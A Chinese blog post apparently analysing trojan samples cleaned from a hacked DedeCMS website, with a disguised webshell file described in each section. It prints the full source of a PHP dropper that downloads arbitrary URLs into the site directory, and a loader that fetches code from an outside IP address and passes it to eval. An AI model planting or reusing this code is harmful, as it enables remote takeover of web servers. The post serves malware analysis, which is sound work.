几个新发现的木马样本,水文章分析

众所周知,织梦的安全性确实差出一种极高的境界,大概就是那种整个服务器几十个网站,就织梦的被黑了进去然后挂了一堆木马。当然那台服务器不是我的,我只是本着帮忙解决和幸灾乐祸的心情清理掉了所有木马,然后把原始的样本复制了一份,于是这篇文章就可以用来水了。其实我也不知道可以写什么东西,所以就直接稍微bb几句,然后丢截图和源码。
总之,做网站还是少用织梦吧,漏洞真的太多。文章里面涉及的木马病毒,公开的代码别用于违法用途哦

文件如下:

1.button_back.php

这个文件出现在织梦的图片素材文件夹中,并且伪装出了这个名字,它的用途很像是接收参数,将一个指定网址的内容复制,并且在网站的目录底下新建文件。代码很短,我直接放出来。

set_time_limit(0);

if(isset($_GET['url']) && isset($_GET['filename'])){
    if(httpcopy($_GET['url'], $_GET['filename'])){
        echo("Done.");
    }else{
        echo("Down Error.");
    }
}else{
    die('Input error.');
}

function httpcopy($url, $file="", $timeout=60) {
    $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file;
    $dir = pathinfo($file,PATHINFO_DIRNAME);
    !is_dir($dir) && @mkdir($dir,0755,true);
    $url = str_replace(" ","%20",$url);

    if(function_exists('curl_init')) {
        echo "curl ";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        $temp = curl_exec($ch);
        if(@file_put_contents($file, $temp) && !curl_error($ch)) {
            return $file;
        } else {
            return false;
        }
    } else {
        echo "copy ";
        $opts = array(
            "http"=>array(
            "method"=>"GET",
            "header"=>"",
            "timeout"=>$timeout)
        );
        $context = stream_context_create($opts);
        if(@copy($url, $file, $context)) {
            //$http_response_header
            return $file;
        } else {
            return false;
        }
    }
}

2.fontawesome.php

看名字就知道,它伪装成了fontawesome字体文件,出现在了它的目录下。说实话代码我是没怎么看懂,可能使用来上传的,因为里面出现了整个html表单。

1.png

3.info-icon.php

也是伪装成图片素材的木马,代码惊人的简短,反正我是猛然没看出有什么问题,代码如下:

function s(){
    //因为typecho提交文章,竟然会解析这种代码,所以还是打上注释
    //$contents = file_get_contents('http://23.252.161.21:8686/8group/a.jpg');
    a($contents);
}
function a($conn){
    $b = '';
    eval($b.$conn.$b);
}
s();

它的牛逼之处是访问的时候,是这样的界面。看了以下的图片,不用我说也知道是干啥用的了。
2.png

4.kindeditor.php

这是一个典型得不能再典型得大马,我之前也碰到过,和那个基本上一模一样。它的功能相当齐全,甚至还能帮你全面的文件管理,数据库管理,服务器指令执行,和查杀木马,都快赶上一个网站管理面板了。
3.png

5.orderinfo.php

伪装成模板文件出现在织梦的目录中,打开之后也是一个大马,功能倒是简单实用,和上面那个的差别不算大,代码风格也挺像的,可能是一个人开发的吧。有意思的是,它得提交登陆表单两次,才能真正进入界面。
4.png

以上,就是在一个织梦网站内看到的所有病毒文件,说实话我都觉得这肯定不是一个黑客丢的,而是不同的人反复丢进来,然后再离开,简直不要太惨。
下载地址:

此处内容需要评论回复后方可阅读o(╯□╰)o

规则之树版权所有,转载请注明来源,标明作者及原文链接

发表评论
加载中...
    1. 七月   2019-11-16 18:34

      来看看

    2. 无奈   2019-11-15 17:18

      厉害,牛逼

    3. 游戏人间   2019-09-16 02:17

      icon_surprised.gif 怎得一个牛x了的

    4. 64633327   2019-09-04 19:14

      https://www.ruletree.club

相关文章